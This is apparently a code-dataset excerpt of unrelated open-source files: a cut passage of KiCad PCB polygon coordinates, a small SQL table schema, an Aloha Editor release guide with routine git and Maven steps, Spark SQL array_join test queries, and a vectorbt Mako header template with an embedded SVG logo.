31.407) (xy 62.371335 31.407) (xy 62.648574 31.351853) (xy 62.909727 31.24368) (xy 63.144759 31.086637) (xy 63.344637 30.886759) (xy 63.5 30.654241) (xy 63.655363 30.886759) (xy 63.855241 31.086637) (xy 64.090273 31.24368) (xy 64.351426 31.351853) (xy 64.628665 31.407) (xy 64.911335 31.407) (xy 65.188574 31.351853) (xy 65.449727 31.24368) (xy 65.684759 31.086637) (xy 65.884637 30.886759) (xy 66.04 30.654241) (xy 66.195363 30.886759) (xy 66.395241 31.086637) (xy 66.630273 31.24368) (xy 66.891426 31.351853) (xy 67.168665 31.407) (xy 67.451335 31.407) (xy 67.728574 31.351853) (xy 67.989727 31.24368) (xy 68.224759 31.086637) (xy 68.424637 30.886759) (xy 68.58168 30.651727) (xy 68.689853 30.390574) (xy 68.700178 30.338665) (xy 68.923 30.338665) (xy 68.923 30.621335) (xy 68.978147 30.898574) (xy 69.08632 31.159727) (xy 69.243363 31.394759) (xy 69.443241 31.594637) (xy 69.675759 31.75) (xy 69.443241 31.905363) (xy 69.243363 32.105241) (xy 69.08632 32.340273) (xy 68.978147 32.601426) (xy 68.923 32.878665) (xy 68.923 33.161335) (xy 68.978147 33.438574) (xy 69.08632 33.699727) (xy 69.243363 33.934759) (xy 69.443241 34.134637) (xy 69.675759 34.29) (xy 69.443241 34.445363) (xy 69.243363 34.645241) (xy 69.08632 34.880273) (xy 68.978147 35.141426) (xy 68.923 35.418665) (xy 68.923 35.701335) (xy 68.978147 35.978574) (xy 69.08632 36.239727) (xy 69.243363 36.474759) (xy 69.443241 36.674637) (xy 69.678273 36.83168) (xy 69.939426 36.939853) (xy 70.216665 36.995) (xy 70.499335 36.995) (xy 70.776574 36.939853) (xy 71.037727 36.83168) (xy 71.272759 36.674637) (xy 71.472637 36.474759) (xy 71.62968 36.239727) (xy 71.737853 35.978574) (xy 71.793 35.701335) (xy 71.793 35.418665) (xy 71.737853 35.141426) (xy 71.62968 34.880273) (xy 71.472637 34.645241) (xy 71.272759 34.445363) (xy 71.040241 34.29) (xy 71.272759 34.134637) (xy 71.472637 33.934759) (xy 71.62968 33.699727) (xy 71.737853 33.438574) (xy 71.793 33.161335) (xy 71.793 32.878665) (xy 71.737853 32.601426) (xy 71.62968 32.340273) (xy 71.472637 32.105241) (xy 71.272759 31.905363) (xy 71.040241 31.75) (xy 71.272759 31.594637) (xy 71.472637 31.394759) (xy 71.62968 31.159727) (xy 71.737853 30.898574) (xy 71.793 30.621335) (xy 71.793 30.348514) (xy 71.817 30.348514) (xy 71.817 30.611486) (xy 71.868304 30.869405) (xy 71.968939 31.112359) (xy 72.115038 31.331013) (xy 72.300987 31.516962) (xy 72.519641 31.663061) (xy 72.762595 31.763696) (xy 73.020514 31.815) (xy 73.283486 31.815) (xy 73.541405 31.763696) (xy 73.784359 31.663061) (xy 74.003013 31.516962) (xy 74.188962 31.331013) (xy 74.335061 31.112359) (xy 74.435696 30.869405) (xy 74.487 30.611486) (xy 74.487 30.348514) (xy 74.435696 30.090595) (xy 74.335061 29.847641) (xy 74.323719 29.830665) (xy 75.273 29.830665) (xy 75.273 30.113335) (xy 75.328147 30.390574) (xy 75.43632 30.651727) (xy 75.593363 30.886759) (xy 75.793241 31.086637) (xy 76.028273 31.24368) (xy 76.289426 31.351853) (xy 76.566665 31.407) (xy 76.849335 31.407) (xy 77.126574 31.351853) (xy 77.387727 31.24368) (xy 77.622759 31.086637) (xy 77.822637 30.886759) (xy 77.978 30.654241) (xy 78.133363 30.886759) (xy 78.333241 31.086637) (xy 78.568273 31.24368) (xy 78.829426 31.351853) (xy 79.106665 31.407) (xy 79.389335 31.407) (xy 79.666574 31.351853) (xy 79.927727 31.24368) (xy 80.162759 31.086637) (xy 80.362637 30.886759) (xy 80.518 30.654241) (xy 80.673363 30.886759) (xy 80.873241 31.086637) (xy 81.108273 31.24368) (xy 81.369426 31.351853) (xy 81.646665 31.407) (xy 81.929335 31.407) (xy 82.206574 31.351853) (xy 82.467727 31.24368) (xy 82.702759 31.086637) (xy 82.902637 30.886759) (xy 83.058 30.654241) (xy 83.213363 30.886759) (xy 83.413241 31.086637) (xy 83.648273 31.24368) (xy 83.909426 31.351853) (xy 84.186665 31.407) (xy 84.469335 31.407) (xy 84.746574 31.351853) (xy 85.007727 31.24368) (xy 85.242759 31.086637) (xy 85.442637 30.886759) (xy 85.598 30.654241) (xy 85.753363 30.886759) (xy 85.953241 31.086637) (xy 86.188273 31.24368) (xy 86.449426 31.351853) (xy 86.726665 31.407) (xy 87.009335 31.407) (xy 87.286574 31.351853) (xy 87.547727 31.24368) (xy 87.782759 31.086637) (xy 87.982637 30.886759) (xy 88.138 30.654241) (xy 88.293363 30.886759) (xy 88.493241 31.086637) (xy 88.728273 31.24368) (xy 88.989426 31.351853) (xy 89.266665 31.407) (xy 89.549335 31.407) (xy 89.826574 31.351853) (xy 90.087727 31.24368) (xy 90.322759 31.086637) (xy 90.522637 30.886759) (xy 90.678 30.654241) (xy 90.833363 30.886759) (xy 91.033241 31.086637) (xy 91.268273 31.24368) (xy 91.529426 31.351853) (xy 91.806665 31.407) (xy 92.089335 31.407) (xy 92.366574 31.351853) (xy 92.627727 31.24368) (xy 92.862759 31.086637) (xy 93.062637 30.886759) (xy 93.218 30.654241) (xy 93.373363 30.886759) (xy 93.573241 31.086637) (xy 93.808273 31.24368) (xy 94.069426 31.351853) (xy 94.346665 31.407) (xy 94.629335 31.407) (xy 94.906574 31.351853) (xy 95.167727 31.24368) (xy 95.402759 31.086637) (xy 95.602637 30.886759) (xy 95.758 30.654241) (xy 95.913363 30.886759) (xy 96.113241 31.086637) (xy 96.348273 31.24368) (xy 96.609426 31.351853) (xy 96.886665 31.407) (xy 97.169335 31.407) (xy 97.446574 31.351853) (xy 97.707727 31.24368) (xy 97.942759 31.086637) (xy 98.142637 30.886759) (xy 98.29968 30.651727) (xy 98.407853 30.390574) (xy 98.463 30.113335) (xy 98.463 29.830665) (xy 98.407853 29.553426) (xy 98.29968 29.292273) (xy 98.142637 29.057241) (xy 97.942759 28.857363) (xy 97.707727 28.70032) (xy 97.446574 28.592147) (xy 97.169335 28.537) (xy 96.886665 28.537) (xy 96.609426 28.592147) (xy 96.348273 28.70032) (xy 96.113241 28.857363) (xy 95.913363 29.057241) (xy 95.758 29.289759) (xy 95.602637 29.057241) (xy 95.402759 28.857363) (xy 95.373 28.837479) (xy 95.373 28.266578) (xy 98.299899 25.339679) (xy 105.093 25.339679) (xy 105.093001 28.000322) (xy 105.116658 28.240516) (xy 105.210149 28.548715) (xy 105.36197 28.832752) (xy 105.566287 29.081714) (xy 105.815249 29.286031) (xy 106.099286 29.437852) (xy 106.407485 29.531343) (xy 106.728 29.562911) (xy 107.048516 29.531343) (xy 107.356715 29.437852) (xy 107.640752 29.286031) (xy 107.889714 29.081714) (xy 108.094031 28.832752) (xy 108.245852 28.548715) (xy 108.339343 28.240516) (xy 108.363 28.000322) (xy 108.363 26.797) (xy 111.093 26.797) (xy 111.093 27.797) (xy 111.149193 28.113532) (xy 111.266058 28.41302) (xy 111.439105 28.683954) (xy 111.661683 28.915922) (xy 111.925239 29.10001) (xy 112.219645 29.229144) (xy 112.347566 29.260124) (xy 112.601 29.140777) (xy 112.601 26.797) (xy 112.855 26.797) (xy 112.855 29.140777) (xy 113.108434 29.260124) (xy 113.236355 29.229144) (xy 113.530761 29.10001) (xy 113.794317 28.915922) (xy 114.016895 28.683954) (xy 114.189942 28.41302) (xy 114.306807 28.113532) (xy 114.363 27.797) (xy 114.363 26.797) (xy 112.855 26.797) (xy 112.601 26.797) (xy 111.093 26.797) (xy 108.363 26.797) (xy 108.363 25.543) (xy 111.093 25.543) (xy 111.093 26.543) (xy 112.601 26.543) (xy 112.601 24.199223) (xy 112.855 24.199223) (xy 112.855 26.543) (xy 114.363 26.543) (xy 114.363 25.543) (xy 114.306807 25.226468) (xy 114.189942 24.92698) (xy 114.016895 24.656046) (xy 113.794317 24.424078) (xy 113.530761 24.23999) (xy 113.236355 24.110856) (xy 113.108434 24.079876) (xy 112.855 24.199223) (xy 112.601 24.199223) (xy 112.347566 24.079876) (xy 112.219645 24.110856) (xy 111.925239 24.23999) (xy 111.661683 24.424078) (xy 111.439105 24.656046) (xy 111.266058 24.92698) (xy 111.149193 25.226468) (xy 111.093 25.543) (xy 108.363 25.543) (xy 108.363 25.339678) (xy 108.339343 25.099484) (xy 108.245852 24.791285) (xy 108.094031 24.507248) (xy 107.889714 24.258286) (xy 107.640751 24.053969) (xy 107.356714 23.902148) (xy 107.048515 23.808657) (xy 106.728 23.777089) (xy 106.407484 23.808657) (xy 106.099285 23.902148) (xy 105.815248 24.053969) (xy 105.566286 24.258286) (xy 105.361969 24.507249) (xy 105.210148 24.791286) (xy 105.116657 25.099485) (xy 105.093 25.339679) (xy 98.299899 25.339679) (xy 99.383878 24.255701) (xy 99.390408 24.257) (xy 99.665592 24.257) (xy 99.93549 24.203314) (xy 100.189727 24.098005) (xy 100.418535 23.94512) (xy 100.61312 23.750535) (xy 100.766005 23.521727) (xy 100.778 23.492769) (xy 100.789995 23.521727) (xy 100.94288 23.750535) (xy 101.137465 23.94512) (xy 101.366273 24.098005) (xy 101.62051 24.203314) (xy 101.890408 24.257) (xy 102.165592 24.257) (xy 102.43549 24.203314) (xy 102.689727 24.098005) (xy 102.918535 23.94512) (xy 103.11312 23.750535) (xy 103.266005 23.521727) (xy 103.371314 23.26749) (xy 103.425 22.997592) (xy 103.425 22.722408) (xy 103.371314 22.45251) (xy 103.329033 22.350434) (xy 107.137876 22.350434) (xy 107.168856 22.478355) (xy 107.29799 22.772761) (xy 107.482078 23.036317) (xy 107.714046 23.258895) (xy 107.98498 23.431942) (xy 108.284468 23.548807) (xy 108.601 23.605) (xy 109.601 23.605) (xy 109.601 22.097) (xy 109.855 22.097) (xy 109.855 23.605) (xy 110.855 23.605) (xy 111.171532 23.548807) (xy 111.47102 23.431942) (xy 111.741954 23.258895) (xy 111.973922 23.036317) (xy 112.15801 22.772761) (xy 112.287144 22.478355) (xy 112.318124 22.350434) (xy 112.198777 22.097) (xy 109.855 22.097) (xy 109.601 22.097) (xy 107.257223 22.097) (xy 107.137876 22.350434) (xy 103.329033 22.350434) (xy 103.266005 22.198273) (xy 103.11312 21.969465) (xy 102.918535 21.77488) (xy 102.689727 21.621995) (xy 102.43549 21.516686) (xy 102.165592 21.463) (xy 101.890408 21.463) (xy 101.62051 21.516686) (xy 101.366273 21.621995) (xy 101.137465 21.77488) (xy 100.94288 21.969465) (xy 100.789995 22.198273) (xy 100.778 22.227231) (xy 100.766005 22.198273) (xy 100.61312 21.969465) (xy 100.418535 21.77488) (xy 100.189727 21.621995) (xy 99.93549 21.516686) (xy 99.665592 21.463) (xy 99.390408 21.463) (xy 99.12051 21.516686) (xy 98.866273 21.621995) (xy 98.637465 21.77488) (xy 98.44288 21.969465) (xy 98.289995 22.198273) (xy 98.278 22.227231) (xy 98.266005 22.198273) (xy 98.11312 21.969465) (xy 97.918535 21.77488) (xy 97.689727 21.621995) (xy 97.43549 21.516686) (xy 97.165592 21.463) (xy 96.890408 21.463) (xy 96.62051 21.516686) (xy 96.366273 21.621995) (xy 96.137465 21.77488) (xy 95.94288 21.969465) (xy 95.789995 22.198273) (xy 95.778 22.227231) (xy 95.766005 22.198273) (xy 95.61312 21.969465) (xy 95.418535 21.77488) (xy 95.189727 21.621995) (xy 94.93549 21.516686) (xy 94.665592 21.463) (xy 94.390408 21.463) (xy 94.12051 21.516686) (xy 93.866273 21.621995) (xy 93.637465 21.77488) (xy 93.44288 21.969465) (xy 93.289995 22.198273) (xy 93.278 22.227231) (xy 93.266005 22.198273) (xy 93.11312 21.969465) (xy 92.918535 21.77488) (xy 92.689727 21.621995) (xy 92.43549 21.516686) (xy 92.165592 21.463) (xy 91.890408 21.463) (xy 91.62051 21.516686) (xy 91.366273 21.621995) (xy 91.137465 21.77488) (xy 90.94288 21.969465) (xy 90.789995 22.198273) (xy 90.684686 22.45251) (xy 90.631 22.722408) (xy 90.631 22.997592) (xy 90.632299 23.004122) (xy 86.272952 27.36347) (xy 86.239184 27.391183) (xy 86.211471 27.424951) (xy 86.211468 27.424954) (xy 86.12859 27.525941) (xy 86.046412 27.679687) (xy 85.995805 27.84651) (xy 85.978719 28.02) (xy 85.983001 28.063479) (xy 85.983001 28.837478) (xy 85.953241 28.857363) (xy 85.753363 29.057241) (xy 85.598 29.289759) (xy 85.442637 29.057241) (xy 85.242759 28.857363) (xy 85.213 28.837479) (xy 85.213 23.910655) (xy 85.37312 23.750535) (xy 85.526005 23.521727) (xy 85.538 23.492769) (xy 85.549995 23.521727) (xy 85.70288 23.750535) (xy 85.897465 23.94512) (xy 86.126273 24.098005) (xy 86.38051 24.203314) (xy 86.650408 24.257) (xy 86.925592 24.257) (xy 87.19549 24.203314) (xy 87.449727 24.098005) (xy 87.678535 23.94512) (xy 87.87312 23.750535) (xy 88.026005 23.521727) (xy 88.131314 23.26749) (xy 88.185 22.997592) (xy 88.185 22.722408) (xy 88.131314 22.45251) (xy 88.026005 22.198273) (xy 87.87312 21.969465) (xy 87.678535 21.77488) (xy 87.449727 21.621995) (xy 87.19549 21.516686) (xy 86.925592 21.463) (xy 86.650408 21.463) (xy 86.38051 21.516686) (xy 86.126273 21.621995) (xy 85.897465 21.77488) (xy 85.70288 21.969465) (xy 85.549995 22.198273) (xy 85.538 22.227231) (xy 85.526005 22.198273) (xy 85.37312 21.969465) (xy 85.178535 21.77488) (xy 84.949727 21.621995) (xy 84.69549 21.516686) (xy 84.425592 21.463) (xy 84.150408 21.463) (xy 83.88051 21.516686) (xy 83.626273 21.621995) (xy 83.397465 21.77488) (xy 83.20288 21.969465) (xy 83.049995 22.198273) (xy 83.038 22.227231) (xy 83.026005 22.198273) (xy 82.87312 21.969465) (xy 82.678535 21.77488) (xy 82.449727 21.621995) (xy 82.19549 21.516686) (xy 81.925592 21.463) (xy 81.650408 21.463) (xy 81.38051 21.516686) (xy 81.126273 21.621995) (xy 80.897465 21.77488) (xy 80.70288 21.969465) (xy 80.549995 22.198273) (xy 80.538 22.227231) (xy 80.526005 22.198273) (xy 80.37312 21.969465) (xy 80.178535 21.77488) (xy 79.949727 21.621995) (xy 79.69549 21.516686) (xy 79.425592 21.463) (xy 79.150408 21.463) (xy 78.88051 21.516686) (xy 78.626273 21.621995) (xy 78.397465 21.77488) (xy 78.20288 21.969465) (xy 78.049995 22.198273) (xy 78.038 22.227231) (xy 78.026005 22.198273) (xy 77.87312 21.969465) (xy 77.678535 21.77488) (xy 77.449727 21.621995) (xy 77.19549 21.516686) (xy 76.925592 21.463) (xy 76.650408 21.463) (xy 76.38051 21.516686) (xy 76.126273 21.621995) (xy 75.897465 21.77488) (xy 75.70288 21.969465) (xy 75.549995 22.198273) (xy 75.444686 22.45251) (xy 75.391 22.722408) (xy 75.391 22.997592) (xy 75.444686 23.26749) (xy 75.549995 23.521727) (xy 75.70288 23.750535) (xy 75.823001 23.870656) (xy 75.823 28.837479) (xy 75.793241 28.857363) (xy 75.593363 29.057241) (xy 75.43632 29.292273) (xy 75.328147 29.553426) (xy 75.273 29.830665) (xy 74.323719 29.830665) (xy 74.188962 29.628987) (xy 74.003013 29.443038) (xy 73.784359 29.296939) (xy 73.541405 29.196304) (xy 73.283486 29.145) (xy 73.020514 29.145) (xy 72.762595 29.196304) (xy 72.519641 29.296939) (xy 72.300987 29.443038) (xy 72.115038 29.628987) (xy 71.968939 29.847641) (xy 71.868304 30.090595) (xy 71.817 30.348514) (xy 71.793 30.348514) (xy 71.793 30.338665) (xy 71.737853 30.061426) (xy 71.62968 29.800273) (xy 71.472637 29.565241) (xy 71.272759 29.365363) (xy 71.037727 29.20832) (xy 70.776574 29.100147) (xy 70.499335 29.045) (xy 70.216665 29.045) (xy 69.939426 29.100147) (xy 69.678273 29.20832) (xy 69.443241 29.365363) (xy 69.243363 29.565241) (xy 69.08632 29.800273) (xy 68.978147 30.061426) (xy 68.923 30.338665) (xy 68.700178 30.338665) (xy 68.745 30.113335) (xy 68.745 29.830665) (xy 68.689853 29.553426) (xy 68.58168 29.292273) (xy 68.424637 29.057241) (xy 68.224759 28.857363) (xy 67.989727 28.70032) (xy 67.728574 28.592147) (xy 67.451335 28.537) (xy 67.168665 28.537) (xy 66.891426 28.592147) (xy 66.630273 28.70032) (xy 66.395241 28.857363) (xy 66.195363 29.057241) (xy 66.04 29.289759) (xy 65.884637 29.057241) (xy 65.684759 28.857363) (xy 65.655 28.837479) (xy 65.655 27.504578) (xy 68.903878 24.255701) (xy 68.910408 24.257) (xy 69.185592 24.257) (xy 69.45549 24.203314) (xy 69.709727 24.098005) (xy 69.938535 23.94512) (xy 70.13312 23.750535) (xy 70.286005 23.521727) (xy 70.298 23.492769) (xy 70.309995 23.521727) (xy 70.46288 23.750535) (xy 70.657465 23.94512) (xy 70.886273 24.098005) (xy 71.14051 24.203314) (xy 71.410408 24.257) (xy 71.685592 24.257) (xy 71.95549 24.203314) (xy 72.209727 24.098005) (xy 72.438535 23.94512) (xy 72.63312 23.750535) (xy 72.786005 23.521727) (xy 72.891314 23.26749) (xy 72.945 22.997592) (xy 72.945 22.722408) (xy 72.891314 22.45251) (xy 72.786005 22.198273) (xy 72.63312 21.969465) (xy 72.438535 21.77488) (xy 72.209727 21.621995) (xy 71.95549 21.516686) (xy 71.685592 21.463) (xy 71.410408 21.463) (xy 71.14051 21.516686) (xy 70.886273 21.621995) (xy 70.657465 21.77488) (xy 70.46288 21.969465) (xy 70.309995 22.198273) (xy 70.298 22.227231) (xy 70.286005 22.198273) (xy 70.13312 21.969465) (xy 69.938535 21.77488) (xy 69.709727 21.621995) (xy 69.45549 21.516686) (xy 69.185592 21.463) (xy 68.910408 21.463) (xy 68.64051 21.516686) (xy 68.386273 21.621995) (xy 68.157465 21.77488) (xy 67.96288 21.969465) (xy 67.809995 22.198273) (xy 67.798 22.227231) (xy 67.786005 22.198273) (xy 67.63312 21.969465) (xy 67.438535 21.77488) (xy 67.209727 21.621995) (xy 66.95549 21.516686) (xy 66.685592 21.463) (xy 66.410408 21.463) (xy 66.14051 21.516686) (xy 65.886273 21.621995) (xy 65.657465 21.77488) (xy 65.46288 21.969465) (xy 65.309995 22.198273) (xy 65.298 22.227231) (xy 65.286005 22.198273) (xy 65.13312 21.969465) (xy 64.938535 21.77488) (xy 64.709727 21.621995) (xy 64.45549 21.516686) (xy 64.185592 21.463) (xy 63.910408 21.463) (xy 63.64051 21.516686) (xy 63.386273 21.621995) (xy 63.157465 21.77488) (xy 62.96288 21.969465) (xy 62.809995 22.198273) (xy 62.798 22.227231) (xy 62.786005 22.198273) (xy 62.63312 21.969465) (xy 62.438535 21.77488) (xy 62.209727 21.621995) (xy 61.95549 21.516686) (xy 61.685592 21.463) (xy 61.410408 21.463) (xy 61.14051 21.516686) (xy 60.886273 21.621995) (xy 60.657465 21.77488) (xy 60.46288 21.969465) (xy 60.309995 22.198273) (xy 60.204686 22.45251) (xy 60.151 22.722408) (xy 60.151 22.997592) (xy 60.152299 23.004122) (xy 56.554951 26.60147) (xy 56.521184 26.629183) (xy 56.493471 26.662951) (xy 56.493468 26.662954) (xy 56.41059 26.763941) (xy 56.328412 26.917687) (xy 56.277805 27.08451) (xy 56.260719 27.258) (xy 56.265001 27.301479) (xy 56.265 28.837478) (xy 56.235241 28.857363) (xy 56.035363 29.057241) (xy 55.88 29.289759) (xy 55.724637 29.057241) (xy 55.524759 28.857363) (xy 55.495 28.837479) (xy 55.495 23.996927) (xy 55.646273 24.098005) (xy 55.90051 24.203314) (xy 56.170408 24.257) (xy 56.445592 24.257) (xy 56.71549 24.203314) (xy 56.969727 24.098005) (xy 57.198535 23.94512) (xy 57.39312 23.750535) (xy 57.546005 23.521727) (xy 57.651314 23.26749) (xy 57.705 22.997592) (xy 57.705 22.722408) (xy 57.651314 22.45251) (xy 57.546005 22.198273) (xy 57.39312 21.969465) (xy 57.198535 21.77488) (xy 56.969727 21.621995) (xy 56.71549 21.516686) (xy 56.445592 21.463) (xy 56.170408 21.463) (xy 55.90051 21.516686) (xy 55.646273 21.621995) (xy 55.417465 21.77488) (xy 55.22288 21.969465) (xy 55.069995 22.198273) (xy 55.058 22.227231) (xy 55.046005 22.198273) (xy 54.89312 21.969465) (xy 54.698535 21.77488) (xy 54.469727 21.621995) (xy 54.21549 21.516686) (xy 53.945592 21.463) (xy 53.670408 21.463) (xy 53.40051 21.516686) (xy 53.146273 21.621995) (xy 52.917465 21.77488) (xy 52.72288 21.969465) (xy 52.569995 22.198273) (xy 52.558 22.227231) (xy 52.546005 22.198273) (xy 52.39312 21.969465) (xy 52.198535 21.77488) (xy 51.969727 21.621995) (xy 51.71549 21.516686) (xy 51.445592 21.463) (xy 51.170408 21.463) (xy 50.90051 21.516686) (xy 50.646273 21.621995) (xy 50.417465 21.77488) (xy 50.22288 21.969465) (xy 50.069995 22.198273) (xy 50.058 22.227231) (xy 50.046005 22.198273) (xy 49.89312 21.969465) (xy 49.698535 21.77488) (xy 49.469727 21.621995) (xy 49.21549 21.516686) (xy 48.945592 21.463) (xy 48.670408 21.463) (xy 48.40051 21.516686) (xy 48.146273 21.621995) (xy 47.917465 21.77488) (xy 47.72288 21.969465) (xy 47.569995 22.198273) (xy 47.558 22.227231) (xy 47.546005 22.198273) (xy 47.39312 21.969465) (xy 47.198535 21.77488) (xy 46.969727 21.621995) (xy 46.71549 21.516686) (xy 46.445592 21.463) (xy 46.170408 21.463) (xy 45.90051 21.516686) (xy 45.646273 21.621995) (xy 45.417465 21.77488) (xy 45.22288 21.969465) (xy 45.069995 22.198273) (xy 44.964686 22.45251) (xy 44.911 22.722408) (xy 31.248496 22.722408) (xy 30.959772 22.179738) (xy 30.952503 22.168859) (xy 30.508928 21.862677) (xy 28.307605 24.064) (xy 27.948395 24.064) (xy 25.747072 21.862677) (xy 25.303497 22.168859) (xy 24.988046 22.756306) (xy 24.79326 23.394008) (xy 24.726628 24.057457) (xy 22.615765 24.057457) (xy 22.584004 24.042429) (xy 22.309816 23.9737) (xy 22.027488 23.959783) (xy 21.74787 24.001213) (xy 21.481708 24.096397) (xy 21.356486 24.163329) (xy 21.284903 24.407298) (xy 20.71 24.407298) (xy 20.71 20.71) (xy 27.643893 20.71) ) ) ) )
KiCad
5
tomihbk/splitflap
electronics/splitflap.kicad_pcb
[ "Apache-2.0" ]
CREATE TABLE u ( xx INT UNIQUE AUTO_INCREMENT, yy INT PRIMARY KEY );
SQL
2
WizardXiao/tidb
br/tests/lightning_default-columns/data/defcol.u-schema.sql
[ "Apache-2.0" ]
h2. Release Guide This guide will describe the aloha editor release lifecyle and practical releasing example. Please read http://nvie.com/posts/a-successful-git-branching-model/ which describes in detail the branch structure and release process as seen from git. endprologue. h3. Release Lifecycle h4. Feature Release * Create a new hotfix branch from the +dev+ branch (eg. hotfix-0.26.x) * Create a maven changelog skiplist by listing all changelog entries from (eg. hotfix-0.25.x) * Release from that hotfix-0.26.x branch h4. Hotfix Release A hotfix release can be done from an existing hotfix branch. The hotfix level of the version will be raised one leve. (eg. 0.20.0 -> 0.20.1). Use the jenkins task to release from the hotfix branch. NOTE: Exception: hotfix-0.24.x are still split between commercial release and gpl releases. This means you have to release the GPL version _first_. After this step the commercial version can be released. This step is not needed for 0.25.x releases. h4. Post Release Steps * After a release has been done the tagged version will be merged into the master and dev branch. * A hotfix branch for the release will be created in which hotfixes can be applied. * The tagged version will be merged into the dev branch. Please note that the dev version should always be one level above the current major release version. (eg. current stable is 0.20.0 than the dev branch version would be 0.30.0-dev.) h3. Practical Maven Feature Release Example For Version 0.26.x h4. Preparation 1. Update the dev branch. <shell> git checkout dev git pull origin dev </shell> 2. Create the new hotfix branch <shell> git checkout -b hotfix-0.26.x git push origin hotfix-0.26.x </shell> h4. Release * Use the jenkins ci server to invoke the release build from that branch (Core members only) NOTE: You may have to create a new jenkins job for this new hotfix branch. * Test the created preview release in all supported browsers. * Publish the release using the jenkins upload-alohaeditor-release job. h4. Post Release * Tweet about the release * Checkout the master branch and merge it with the release branch <shell> git checkout master git pull origin master git pull origin hotfix-0.26.x git push origin master </shell> * Update the dev branch <shell> git checkout dev git pull origin hotfix-0.26.x git push origin dev </shell> * Update the dev branch version to 0.26.0-dev-SNAPSHOT <shell> mvn release:update-versions -DdevelopmentVersion=0.26.0-dev-SNAPSHOT -DautoVersionSubmodules=true </shell> h3. Practical Maven Hotfix Release Example 1. Switch to the hotfix-0.25.x branch and update it <shell> git checkout hotfix-0.25.x git pull origin hotfix-0.25.x </shell> h4. Release * Use the jenkins ci server to invoke the release build from that branch (Core members only) * Test the created preview release in all supported browsers. * Publish the release using the jenkins upload-alohaeditor-release job. h4. Post Release Steps * Tweet about the release <shell> git checkout master git pull origin master git pull origin hotfix-0.25.x git push origin master </shell> * Update the dev branch <shell> git checkout dev git pull origin hotfix-0.25.x git push origin dev </shell> * Update the dev branch version to 0.26.0-dev-SNAPSHOT <shell> mvn release:update-versions -DdevelopmentVersion=0.26.0-dev-SNAPSHOT -DautoVersionSubmodules=true </shell> h4. Commercial Releases (0.24.x only) It is also possible to create a commercial release by specifying a different maven profile. A commerical release of aloha editor will contain different license texts. <shell> mvn release:prepare -Pcommercial -Darguments=-Pcommercial mvn release:perform -Pcommercial -Darguments=-Pcommercial </shell> <javascript filename="settings.xml"> <profile> <id>commercial</id> <properties> <build.license>commercial</build.license> <build.licenseType>Aloha Editor commercial license</build.licenseType> <build.licenseUrl>-</build.licenseUrl> <snapshots.repoUrl>http://REPOHOST:8080/archiva/repository/snapshots</snapshots.repoUrl> <snapshots.repoName>Snapshots Repository</snapshots.repoName> <snapshots.repoId>archiva.snapshots</snapshots.repoId> <releases.repoUrl>http://REPOHOST:8080/archiva/repository/releases</releases.repoUrl> <releases.repoName>Releases Repository</releases.repoName> <releases.repoId>archiva.releases</releases.repoId> </properties> </profile> </javascript>
Textile
4
antonella-del/Aloha-Editor
doc/guides/source/releasing.textile
[ "CC-BY-3.0" ]
SELECT array_join(array(true, false), ', '); SELECT array_join(array(2Y, 1Y), ', '); SELECT array_join(array(2S, 1S), ', '); SELECT array_join(array(2, 1), ', '); SELECT array_join(array(2L, 1L), ', '); SELECT array_join(array(9223372036854775809, 9223372036854775808), ', '); SELECT array_join(array(2.0D, 1.0D), ', '); SELECT array_join(array(float(2.0), float(1.0)), ', '); SELECT array_join(array(date '2016-03-14', date '2016-03-13'), ', '); SELECT array_join(array(timestamp '2016-11-15 20:54:00.000', timestamp '2016-11-12 20:54:00.000'), ', '); SELECT array_join(array('a', 'b'), ', ');
SQL
4
OlegPt/spark
sql/core/src/test/resources/sql-tests/inputs/typeCoercion/native/arrayJoin.sql
[ "Apache-2.0" ]
<% from vectorbt import __version__ %> <header> <a class="homelink" rel="home" title="pdoc Home" href="https://github.com/polakowo/vectorbt"> <img src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KPCEtLSBHZW5lcmF0b3I6IEFkb2JlIElsbHVzdHJhdG9yIDI1LjAuMSwgU1ZHIEV4cG9ydCBQbHVnLUluIC4gU1ZHIFZlcnNpb246IDYuMDAgQnVpbGQgMCkgIC0tPgo8c3ZnIHZlcnNpb249IjEuMSIgaWQ9IkNhcGFfMSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayIgeD0iMHB4IiB5PSIwcHgiCgkgdmlld0JveD0iMCAwIDUxMiA1MTIiIHN0eWxlPSJlbmFibGUtYmFja2dyb3VuZDpuZXcgMCAwIDUxMiA1MTI7IiB4bWw6c3BhY2U9InByZXNlcnZlIj4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KCS5zdDB7ZmlsbDojRUYwMDAwO30KCS5zdDF7ZmlsbDojRkY5MDAwO30KCS5zdDJ7ZmlsbDojRkZERjAwO30KCS5zdDN7ZmlsbDojMjgyQzM0O30KPC9zdHlsZT4KPGc+Cgk8Zz4KCQk8Zz4KCQkJPHBvbHlnb24gY2xhc3M9InN0MCIgcG9pbnRzPSIxNTUuMywzMDAuMSAyODMuMSwwIDIwOCwwIDExMC44LDAgMzUuOCwwIDEuMiw0NTAuMiA3Ni4zLDQ1MC4yIAkJCSIvPgoJCTwvZz4KCTwvZz4KCTxnPgoJCTxnPgoJCQk8cG9seWdvbiBjbGFzcz0ic3QxIiBwb2ludHM9IjIzMC40LDMwMC4xIDM1OC4xLDAgMjgzLjEsMCAxODUuOCwwIDExMC44LDAgNzYuMyw0NTAuMiAxNTEuMyw0NTAuMiAJCQkiLz4KCQk8L2c+Cgk8L2c+Cgk8Zz4KCQk8Zz4KCQkJPHBvbHlnb24gY2xhc3M9InN0MiIgcG9pbnRzPSIzMDUuNCwzMDAuMSA0MzMuMSwwIDM1OC4xLDAgMzMxLjYsNjIuMyAyNjAuOCwwIDE4NS44LDAgMTUxLjMsNDUwLjIgMjI2LjQsNDUwLjIgCQkJIi8+CgkJPC9nPgoJPC9nPgoJPGc+CgkJPGc+CgkJCTxwb2x5Z29uIGNsYXNzPSJzdDMiIHBvaW50cz0iNTEwLjgsMCA0MzMuMSwwIDMwNS40LDMwMC4xIDMzOC40LDAgMjYwLjgsMCAyMjYuNCw0NTAuMiAzMDQsNDUwLjIgCQkJIi8+CgkJPC9nPgoJPC9nPgo8L2c+Cjwvc3ZnPgo="/> vectorbt <span class="version">${__version__}</span></a> </header>
Mako
2
haxdds/vectorbt
docs/templates/logo.mako
[ "Apache-2.0" ]
